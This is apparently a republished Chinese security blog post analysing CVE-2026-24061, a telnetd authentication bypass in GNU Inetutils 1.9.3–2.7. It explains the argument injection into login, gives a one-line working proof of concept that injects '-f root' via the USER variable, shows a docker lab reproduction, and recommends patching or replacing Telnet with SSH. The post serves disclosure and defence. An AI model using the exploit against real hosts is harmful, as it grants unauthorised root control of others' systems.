文章总结： GNUInetutilsTelnetd存在严重的远程认证绕过漏洞CVE-2026-24061，影响1.9.3至2.7版本。该漏洞因telnetd未净化USER环境变量，导致攻击者可注入-froot参数欺骗login程序跳过密码验证，直接获取root权限。建议立即升级至修复版本或应用补丁，并停用Telnet改用SSH以彻底消除风险。 综合评分： 92 文章分类： 漏洞分析,漏洞POC,漏洞预警,网络安全,代码审计

GNU Inetutils Telnetd 远程认证绕过漏洞（CVE-2026-24061）深度剖析与防护指南

原创

m3x1 m3x1

梦醒安全

2026年1月23日 14:43 湖北

免责声明：本公众号内容仅用于知识分享和学习，由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号梦醒安全及作者不为此承担任何责任，一旦造成后果请自行承担！

PART.01

内容

一、漏洞介绍

• 漏洞编号

  ：CVE-2026-24061

• 影响组件

  ：GNU Inetutils 中的 telnetd 服务端程序

• 受影响版本

  ：GNU Inetutils 1.9.3 至 2.7 版本

• CVSS评分

  ：9.8（CRITICAL）

• 漏洞特性

  ：远程、无需用户交互、无权限依赖，仅需发送构造的登录请求即可触发

• 危害后果

  ：攻击者直接绕过正常认证流程，以root权限登录目标系统，实现完全控制权接管

该漏洞存在于GNU Inetutils套件的telnetd服务中，攻击者可利用此漏洞绕过密码校验，直接获取目标系统的root权限，风险等级极高。

该漏洞利用门槛较低，无需复杂技术储备，且利用过程无明显日志特征，易被攻击者隐蔽利用

二、漏洞原因

该漏洞属于典型的命令参数注入漏洞（对应CWE-88：命令中参数分隔符的不当中和），核心风险在于未对用户输入进行安全校验，导致攻击者可通过构造恶意请求绕过认证机制。

该漏洞的根源在于telnetd服务在调用系统/usr/bin/login程序进行身份认证时，未对USER环境变量进行有效过滤与校验。攻击者可通过注入特殊命令行参数（如“-f root”），篡改login程序的执行逻辑，直接跳过密码验证环节，以root用户身份登录目标系统。

要理解该漏洞的触发机制，需先明确GNU Inetutils Telnetd的登录处理流程，核心问题出在用户环境变量传递与命令调用的安全校验缺失上。

正常登录流程

当远程客户端发起Telnet连接请求时，telnetd服务端会调用系统的 /usr/bin/login 程序执行身份验证，此时telnetd会将客户端传递的用户环境变量（如USER）作为参数传递给login程序，由login程序完成账号密码校验、权限分配等操作。

漏洞触发关键环节

漏洞的核心在于telnetd对客户端传递的用户环境变量未做任何 sanitize（净化）处理，直接原样转发给login程序，导致攻击者可通过构造恶意环境变量值实现参数注入。具体逻辑如下：

1. 参数注入构造

   ：攻击者通过Telnet客户端的 -a 或 --login 参数，向telnetd服务端发送USER环境变量，值设置为 -f root。这里的 -f 并非普通用户名的一部分，而是login程序的内置参数。

2. 不安全参数传递

   ：telnetd在处理该环境变量时，未检查字符串是否包含命令参数分隔符或特殊选项，直接将 -f root 作为参数传递给login程序。

3. login程序权限绕过

   ：在类UNIX系统中，login程序的 -f 选项为“可信登录标记”，允许在特定条件下跳过密码校验流程，直接以指定用户身份登录。当login程序接收到 -f root 参数时，会误认为是合法的可信登录请求，直接授予root权限，无需验证密码。

漏洞分析

首先看下列代码：

其中 %U 变量由telnetd/utility.c中的 _var_short_name() 函数解析，该函数直接返回 getenv("USER") 的值，无任何输入校验逻辑，导致攻击者可随意构造变量内容注入恶意参数。

三、利用手法

攻击者通过恶意构造 USER环境变量，使其包含 -f root 例如，攻击者将 USER 设置为 -f root，telnetd 可能会将其解析并传递给 login。

最终，telnetd 执行的命令实际上变成了：

/bin/login ... -f root

由于 telnetd 本身是以 root 权限运行的，login程序会跳过密码验证，直接以root身份登录

四、影响范围

影响版本：1.9.3 <= GNU Inetutils <= 2.7

五、POC

USER='-f root' telnet -a

如果目标存在漏洞，您将不会看到常规的 Login: 或 Password: 提示符，而是直接进入目标系统的 Root Shell。示例如下：

六、漏洞复现

环境搭建

使用docker搭建漏洞环境

1. 拉取文件

git clone https://github.com/leonjza/inetutils-telnetd-auth-bypass.git

2. docker镜像创建

docker build -t telnetd-exploit .

3. 启动镜像

docker run --rm -it telnetd-exploit

漏洞利用

输入如下命令

USER='-f root' telnet -a 127.0.0.1

说明是已经攻击成功了

七、修复建议

1. 补丁更新或版本升级

GNU官方已发布漏洞修复补丁，核心修复逻辑是在 _var_short_name() 函数中增加输入校验：

• 检查用户名首字符是否为 -（避免构造命令选项）；
• 检测字符串中是否包含shell元字符（如 \t、\n、!、#、$、& 等）；
• 仅当两项校验均通过时返回原值，否则返回空字符串，阻断参数注入。

修复建议：优先升级至含修复补丁的GNU Inetutils 2.8版本（官方后续发布）；暂无法升级则从GNU官方仓库或OSS-Security邮件列表获取补丁，对1.9.3-2.7版本手动编译应用。

• 直接升级至包含修复补丁的GNU Inetutils版本（可关注官方仓库后续发布的2.8版本，或获取当前补丁手动编译）；
• 手动应用补丁：从GNU官方仓库或OSS-Security邮件列表获取修复补丁，对现有1.9.3-2.7版本进行补丁编译升级。

1. 协议替代与安全管控

从安全角度，建议彻底淘汰Telnet协议，改用SSH协议（加密传输、身份验证机制更完善）替代远程管理需求；同时建立组件全生命周期管理机制，定期排查系统中安装的遗留协议组件，及时清理不必要的服务，降低攻击面。

PART.02

往期推荐

往期好文

深挖HTTP请求走私漏洞：原理、利用与防御

自开CVE-2025-55182 漏洞检测与利用工具（GUI版）使用指南

实战利器：Burp微信小程序解包插件

Nacos系列漏洞：风险点与综合利用工具详解

实战解析：绕WAF的SQL注入变形技巧思路

揭秘PDF与JS混编攻击：Polyglot文件的构造与防御

深入理解OAuth 2.0：原理、流程与安全风险

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：梦醒安全 m3x1 m3x1《GNU Inetutils Telnetd 远程认证绕过漏洞（CVE-2026-24061）深度剖析与防护指南》